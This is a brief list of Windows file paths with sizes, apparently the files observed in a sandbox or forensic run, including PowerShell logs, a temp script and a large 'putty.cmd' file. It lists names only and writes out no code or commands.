C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log (1KB)
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive (18 versions; sizes 19KB, 3KB, 21KB, 136B, 21KB, 21KB, 13KB, 21KB, 436B, 21KB, 836B, 21KB, 21KB, 21KB, 21KB, 3KB, 21KB, 836B)
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (10 versions, 1KB each)
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0pmc4ixn.uhp.ps1 (60B)
-
C:\Users\Admin\AppData\Local\Temp\tempScript.ps1 (1KB)
-
C:\Users\Admin\putty.cmd (1.8MB)